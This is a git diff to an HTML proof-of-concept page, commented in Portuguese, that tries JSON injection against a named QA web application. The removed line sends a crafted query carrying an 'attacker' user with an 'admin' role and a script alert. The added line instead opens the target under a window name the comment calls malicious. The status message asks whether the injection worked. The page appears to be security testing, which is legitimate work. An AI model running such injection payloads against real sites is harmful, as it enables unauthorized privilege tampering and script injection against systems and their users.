--- a/index.html
+++ b/index.html
@@ -38,9 +38,8 @@
     <script>
         function openTarget() {
             // Abrir a aplicação alvo com um nome de janela malicioso
-            window.open('https://qa.neoway.com.br/apps/?data={"user":"attacker","role":"admin","script":"alert(\'Hacked!\');"}');
-            document.getElementById('status').innerHTML = 'Aplicação alvo aberta. Verifique a nova janela para ver se a injeção de JSON foi bem-sucedida.';
-        }
+            window.open('https://qa.neoway.com.br/apps/', 'maliciousWindow');
+            document.getElementById('status').innerHTML = 'Aplicação alvo aberta. Verifique a nova janela para ver se a injeção de JSON foi bem-sucedida.';}
         // Verificar se a injeção de JSON foi bem-sucedida
         window.onload = function() {
             try {
